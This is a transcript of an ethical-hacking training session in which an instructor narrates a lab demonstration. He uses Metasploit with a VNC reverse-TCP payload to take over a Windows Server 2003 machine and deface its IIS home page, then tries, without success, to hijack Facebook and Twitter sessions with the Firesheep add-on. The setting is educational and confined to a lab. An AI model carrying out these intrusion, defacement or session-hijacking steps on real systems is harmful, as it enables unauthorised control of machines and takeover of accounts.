Okay. So once I'm here, now I'll type show options. Okay, now when I type show options, what I find is it shows me that it requires a remote host IP address. Okay, remote host IP address is nothing but the target address. That's what it needs. It also needs a remote port, but this here, remote port is already set to 445. You understand? So I'm going to put up set our host 192.168.0.124. That's the IP address of the 2003 server.
So R, instead of to have L host, now you have R host.
That's correct. Depends on the exploit or depends on the payload, right? So I'm doing it according to the requirement. That's why I'm always typing in show options to see what all parameters it needs.
Okay.
Then I want to use a payload to launch the attack, right? To do that, I'll type show payloads. Okay, to see a list of payloads.
Okay.
You understand? Okay, it's saying invalid parameter payload. Oh, okay, I think I need to type show payloads. S, I missed out the S. That's the reason it was giving an error. Yeah, there you go. That's the list of payloads that I have. Okay, but out of that, or out of this long list of payloads that we have, we are just going to use one single payload. Okay, let me just pick that up. There you go. This is what I'm going to use. Windows VNC inject reverse underscore TCP. You understand?
Yeah.
Okay. So I'll just copy it, and then I'll type set payload, and then I'll paste this value. You get that?
Payload. Yes, I got it.
Okay. Now once I've set the payload, again I'll type show options because I want to see what all parameters does it require. Okay, there you go. It gives me all of this. So it's saying auto VNC true, L host is blank, but L port, VNC host, everything has been set. You understand? So it needs L host for it. Okay, it needs a L host. So I'll type set L host 192.168.0.103.
Okay.
Okay, now once I've done that, I'm ready to launch the attack. To launch the attack, the command is exploit. Do you understand? And when I press enter, there you go.
Oh.
Okay, I see the screen of the Windows Server 2003. In fact, the main thing or the best part, I can even log in into it. Sorry, I think it took me into this one. Let me just. Okay, now how do I log in? I think there is a shortcut for logging on through WinVNC, which I'm not aware of at this point. But what I'll do is I'll go into the 2003 server and I'll log in and keep it ready so that we are able to work on it directly. Okay, I'll keep the screen, and that's what you'll see even out there on backtrack. Okay, so that's what you find out here. In fact, I'll just close it. Yeah, I'll just close it and open it up again. Exploit. And there you go. You see that?
Yeah, see it.
Okay, so I see the screen of the 2003. Plus, I got a shell of my own, for controlling that remote computer. I'll just minimize this.
And
now.
then, okay.
I can close the services. I can do whatever I want on this 2003 server. Okay, so I can go into computer, IIS manager, Okay, and what I can do is, let's say that's the IIS service that they are running. So I'll expand that websites, default website. Now, basically what it does is, okay, it's using some the default page. How it looks like is like this, under construction, right? Okay, it shows under construction by default. So what I'll do is I'll just go into my computer. Okay, I'll go into the C drive, initpub www root. I'll create a, or I'll just right click on this HTML file, edit. Okay, it's going to open it up in Notepad out here. Okay, and then what I'm going to do is I'm going to change certain parameters here. Okay. Okay, so I did that, and now due to this, if at all I go into some other machine or someone else tries to open up the browser and connect to this server here. It should show me the new content basically. That's what I wanted to tell you. Okay, istart.html. I think I modified the wrong page because if I go into properties, yeah, that's correct. I modified the wrong page. I didn't really modify the correct one. Yeah,
what did you open now so that I can actually on top of it?
yeah, it's a direct. It's basically the properties on the web server. No, I'm just trying to scroll up, but it's not allowing me to. The screen, it's actually a resolution problem. That's the reason it's not able to. But anyways, I got it in here, and I'm going to use this. Okay, so I'm going to remove everything else just to demonstrate this thing to you. Okay, so this is what I'm going to use. Okay, and if I browse right now, this is what I'm going to see. Okay, now what happened? I think it didn't really modify the code. It did actually. I'm not sure what's going. Oh, okay. It only modified the title page. Okay, but I'm not. I'm supposed to also modify this. So I'll just copy this. And I'll modify this. Yeah, actually, I modified it at the title. I didn't modify the other section. That's the reason it didn't work. Okay, so I'll just save it and then exit out of it. And now, if I go back into the Windows 7 machine and refresh it, let's say. Okay. Now it's not going to open up the page because my firewall is not allowing that to happen. Do you understand? My firewall is not allowing web access, right? Okay, on purpose we had disabled everything. I'll just go into properties, advanced settings, exceptions, add port, and HTTP is what I'll put, and port number 80 is what I'll put. I'll click OK and OK again. And now if I go into the Windows 7 machine, sorry, and refresh it, there you go. See, the title as well as this page has been changed. From under construction, it has become under attack. So basically, what have I done? I have defaced this web server. You understand?
That's activism.
Was that?
Activism.
Yep, that's correct. Imagine doing it on a live web server. Okay, so that's the whole idea. In fact, I can literally do everything possible because I have now total control of the desktop. In fact, if I go into backtrack right now, see, I have this desktop here. So whatever happens on this desktop, I know about it. You understand that?
Okay. Yeah. What is that? The name of the Internet Explorer sign I see there. The one to modify.
Oh no, that's the HTML file. That's the web page or the home page for the website, default website.
Oh, home page. Okay, home page.
Yeah,
okay.
yeah. I just modified it. That's it.
Okay.
I just wanted to show you a demo wherein you understand. Okay, that this is how people can deface a website. You understand that?
Okay.
Now I cannot really show it to you on a live web server because it's illegal, right? I do not want to get into those hassles. That's why I prefer to show it to you in a lab environment. You understand?
Okay.
Okay. So that was another kind of an attack which I wanted to show you. Okay. And if I type exit out of this, done. So this was Metasploit framework for you. Okay. Which means now, if I look at the pending topic list, we are done with this much. We are just left with one more topic. Okay, and I think okay, I just looked at the time and I found that we are already half an hour towards the end of the topic, and half an hour is what I would need to demonstrate session hijacking. That's fine.
Okay.
I think we'll have to extend our session a bit. I hope that's all right with you.
No problem.
It may go ahead just by one more day. That's what might would happen.
No problem.
As long as you are learning stuff, I don't think it should be a problem even if it goes by one more session ahead.
Yeah.
Okay. So let me show you the last set of pending lab. Now see, I was more focusing on finishing of this particular lab section today is because after this, whatever topics we are going to go through, more or less is going to be theoretical.
Okay.
Because hacking wireless networks, I do not have the USB wireless device with me to conduct the attack.
Okay.
So since I do not have the tool with me, I'll not be able to demonstrate a real attack to you. You understand? In fact, I had one USB drive, but USB device, but accidentally I happened to forget it when I took the training last. In Thailand itself. It's still in Thailand.
Oh.
Okay, so I accidentally forgot it there. So that's the reason I'm not able to use that. Otherwise, I would have shown you the demonstration page for that. But it's all right. As long as you'll understand the concept, it should be all right. Okay, but let me get to this pending topic here. Okay, of session hijacking, and the target this time is going to be Facebook. You understand?
Okay.
Okay. So to show you this, I'm going to use a Windows 7 machine. Okay, I'm going to use a Windows 7 machine here. I'll just close this out. Okay, so basically what I'm going to show you is, let me just show you a basic kind of behavior. Okay, like if I open up Internet Explorer right now, under Internet Explorer, let's say I go into facebook.com. Okay, now I've gone into facebook.com, and under facebook.com, let's say I log in into it. Okay. Login. Now that's my Facebook page, okay?
Yes.
Now I'll not show you more details, but yeah, that's my Facebook page which is open. Remember, I had opened up this page under Internet Explorer.
Yes.
Do you understand? Okay, this page is open under Internet Explorer. Now I'll open up Mozilla.
On the same machine?
Yes, on the same machine, I'm using Mozilla. And when I go into Mozilla here, and if I open up facebook.com again under Mozilla, bottom line is, see the cookies related to facebook.com, okay, the cookies that are running related to facebook.com should hold information about the username and password and the session and everything, okay. But the problem is Mozilla didn't pick it up. You understand? A different browser, if I make use of, like Chrome for example, okay, if I make use of a different browser, then in that case that browser is going to maintain its own set of cookies. It's not going to use the other cookies. You understand that? So bottom line is, it's again asking me for username and password to log in.
Okay.
Clear? So that's why what I'm going to do is I'm going to install an add-on related to Firefox, which what I'm going to do is using that add-on, I'm going to capture this cookie which this browser is using, and through that I'll be able to work on that session through Mozilla.
Okay.
I need not log in into that page at all. You understand that? Okay, so typically that's what a session hijacking is all about. You're taking over a session in this manner. Do you get that now?
Yes.
Okay, so what I'll do before that is, okay, I'll install this particular add-on which I want to. So meanwhile, I'll just log out of this particular page here.
So you log out. Okay.
Yeah, I just log out because I'll just install the tool and then I'll log back in again. Okay.
Okay.
So I'll go into devices and CD DVD, and I'll go into session hijacking.
Wait a minute. Oh, yeah. Okay. You go into
loaded the DVD. That's it. Under the toolkit, now session hijacking tool is what I have, and in that I'm going to load FireSheep. Okay, that's the Firefox add-on which I was talking about before.
FireSheep. Okay.
So I'll just open that up. Now this file, it's saying, I mean, it's giving me a blank here. It's not showing what it's supposed to be opened up with and all that. So I'll just open it, and when I open it, it's saying select a program, with which to open it. So I'll just select the program. I'll click on OK, and from this list, I'm going to use Mozilla. So to use Mozilla, I'll go into Browse. Mozilla Firefox, and I'll choose Firefox, and I click on Open. So there you go.
You went to program file.
Yeah, I'm just opening up this application using Mozilla. That's it. Okay. I'm just searching and getting hold of Firefox so that this application can be opened up with Mozilla Firefox. You get that now?
No, my question is, you went to program file instead of to open it from the icon itself.
Yeah, yeah. Because the icon was not listed here, so I have to browse, right?
Oh, if it was listed, you just open from the icon.
That's right. You get that now?
Yeah.
Okay. I click on OK. There you go. It says FireSheep could not be installed because it is not compatible with Firefox 20.0.1. So bottom line is the Firefox version that I have okay, is happens to be a new version or the latest version. Okay, so I need to have an older version of Firefox, and then Firesheep would be installed. Okay, so let me go ahead and search for Firesheep add-on.
Okay.
I'll go into add-ons. Okay, so Firefox itself gives me the option of add-ons. So I'll type Firesheep and I'll search. I'll try to get hold of the latest add-on, okay, rather than using the one in the DVD, because my browser is the latest one. Okay, I have all of these, but I do not have Firesheep because, you know, one of the things is Mozilla came under a lot of fire when they launched Firesheep because of this particular thing that they could do, you know.
No.
Okay, so let me just go back into the tool and I'll search for which browser version is compatible for this particular version. Okay.
Are you in the torrent?
No, no, no. I'm not going to use any torrent. I'm just going to go to Google and search.
Okay.
Oh, okay. Firefox 19.0.2. Or old version. Okay. So older versions of Firefox are shown out here. So let me just go ahead and get hold of that.
The 19.02.
0.2. Yeah. That's what I'm going to use. There you go. I'll just close Firefox because you know, I want to install a older version of the browser, right?
You run it?
No, I'll just uninstall it because the point is, you know, if it finds a newer version, it's not going to install the older one.
Yes, okay.
Done. It has been uninstalled. So now if I go back into this particular page here, there you go. So I'll just save it onto the desktop.
Okay.
Let's see how much time it takes. You know, because this is the last lab for today, so we do not have anything else to do. So I'll just pause the recording in the meanwhile, and then I'll resume it once the download is completed. Okay. Yeah. So we have a download complete now. So I'll just run this application. Okay, now this is one thing that I like about Mozilla. It's quick, it's fast, you know, when it comes to installation.
I have so much problem installing my application, so you're gonna help me out. Just give me tips. I will, you know. what
yeah.
did wrong.
Okay, so I'm just waiting for it to load now.
Okay. Did you stop the file ship?
Oh no, I didn't start the file sheet yet. Okay, there you go. That's another window that comes up. So I'm don't report anything, and that's my browser window. Okay, so my Mozilla has been installed. Now let's check, or let's try to install Firesheep. Okay, again, so I'll right click on Firesheep, open, select a program. Okay, Firefox is listed here. Okay, if it was not, I would have browsed it. I'll just click on OK. Oh, come on. I'm saying Firesheep could not be installed because it is not compatible with Firefox 19.0.2.
Oh.
Strange.
Which one is to be now? Very, very old.
Okay, so what I'll do is I'll just try to download a old version of Mozilla. Meanwhile, I'll pause the recording. Okay, completely.
Okay. Okay.
So hopefully this time I've downloaded the right version of Mozilla. I've downloaded Mozilla 3.6.27. Okay, 3.6 is what I've installed. So as you see, okay, now it shows that it's associated with Mozilla. So I'll just double click on it now. Okay, I'm just waiting for it to open now. Somehow it's taking time on my system here. Okay, now what it does is, this is the kind of a screen that it comes up with. Okay, and then I have to just click on install now. You understand? Okay, but in my case, since I've already installed it, it comes up with this kind of a thing saying that this Firesheep has been installed. Clear with that? So when I click on options here, okay, now that's the adapter that is going to use for my capture. Okay, and the websites, and in fact, I mean, a lot of different websites are possible with regards to that. Okay, so I'm just going to keep it as it is. I'm not going to touch them or modify them, or not going to change anything. I'll just close this. Okay, so which means now we are ready for the demo again. Okay, so let me go ahead and close all the unnecessary windows here. And let me open up Facebook. Okay. So I'll just open up Facebook. Yeah. So Facebook is opening up, and meanwhile, I'll just.
What did you use? You use Internet Explorer, right?
That's correct. That's correct. And I'll log in into it. Okay, now that's the page that comes up. Okay, now I'm not going to do much with this. I'll just keep it as it is. But earlier also we had the same thing, right? Okay. Earlier also we had a similar kind of thing, but this is one new thing that it has added up with. You see that? Since we have installed Firesheep, it has added up this particular component here. And now when I click on start capturing, okay, so it is going to start capturing the Firesheep, the Facebook session info. Let's check whether it does. Okay, let me try meanwhile accessing Facebook from here, facebook.com. Okay, so as you notice, it's taking me to the login screen yet, right? It's not taking me into the session yet. Okay, so it has started capturing the session. Okay, meanwhile, I'll click on stop capturing, and it's saying backend exited with error 1. I'm not sure what's going on. So Facebook is here, so I'm not sure what's going on. Okay, so it should be able to capture. So let me do that again. Meanwhile, I'll just try to browse through my page here. Okay, so that's what comes up, and I'll go back into Mozilla and I'll try to stop capture. It's failing for some reason. Okay, I'll just close Mozilla and open it up again.
Yeah.
Okay, bottom line is, like, when I click on that capture of capture of the sessions, it's
Yes.
going to show me the session, and when I click on it, I'm actually inside that particular Facebook session. That's what it's a very easy demonstration actually, but some backend issues is what it's talking about. Let's give it a try once more, and then we'll check it up. Okay.
Okay.
Okay, it's saying Firefox browser is out of date, but let me click on start capture and stop capture. See, there you go. Backend exited with error 1. I'm not sure what that is. Okay, so it's coming up with some error, but ultimately, it gives me that capture information here. And when I click on it, it's going to open up that Facebook session out here. Now that's what it's supposed to do. Clear with that?
Okay.
Nope, it's still giving me the same error. Okay, I'm not sure what's going wrong. Maybe it's because of the older version.
Do you think because they patch very well the web server?
No, it's nothing to do with the patching of the web server, but basically it's something to do with this add-on. This add-on which we have done, which we have got hold of, Firesheep, may not be a good package or something is corrupt inside that. You never know, right?
Okay.
So let me go into tools, add-ons, and try to search for Firesheep. If at all we are able to get hold of it, find updates is what I'll do. Okay, so no updates were found is what it's saying. So bottom line is Firesheep version is the same. This is the only version that is available. But like I said, it's an older tool, and the moment this was found that this tool has this kind of a problem, people stopped using it, or Mozilla stopped developing this particular tool.
Okay.
Okay. So let's see if I can get hold of Firesheep equivalent is what I'll search for. Okay.
Okay.
Okay, Droid Sheep is also available for Android phones. Okay. Okay, let me check this. I'll start the capturing again. Okay, just to check it up. I'll go into Facebook. I'll sign out again or log out, I should say, and then I'll go ahead and log in again. Okay.
Okay.
Just to check if it all can do it. Okay, so I've done that. And stop capturing. No, same thing again. Okay. Now, one of the other reasons can be that Facebook, in the meanwhile or over a period of time, had done certain changes to its privacy setting. You know, the way in which it will store its cookies and all that. It had done some changes to its website in that manner. So maybe that can also be one of the reasons why this is not there, or it's not working out. You know, can be possible, quite possible.
Okay.
You understand that?
Yes.
Okay. Okay, let me check what other things it can do.
Okay.
Okay, websites, now it can check for all of this. So let me check Windows Live, WordPress, Twitter. Okay, it can also look after Twitter. Okay.
Twitter. Okay.
So let me try that then. Okay, meanwhile I'll just go in here and start the capturing so that you know, let it do it in the background.
Okay.
Okay, so that's my Twitter page, and if I go in here and stop capturing, let's say, now same thing again, backend exited with error 1. So bottom line is it's something to do with the browser version and maybe something like that, you know.
Okay.
Yeah, it's giving me some Linux equivalent, but I do not want to get into that.
Okay.
No, it's giving me some code which I have to install, and that's for Linux system, not for this one. But I hope you understood the logic behind this. Okay, it's like it will show me the session here, and when I click on it, I'll see the same screen like this one out there. You know, so bottom line is I have hijacked this HTTP session. That's what I do out here.
Oh,
You understand?
HTTP. Oh, okay.
Yeah, yeah, it's a HTTP session that I've hijacked. That's what I tried to do. Okay,
Hmm.
but I'm not able to demonstrate that to you because of that error which is coming up here. Okay.
Oh.
But no problem. I think I'll try to find out if there is something else that I can do with it. But meanwhile, yeah, that's pretty much what I had for you today. Okay.
All right.
Okay, I'll just stop the recording.
Okay.
And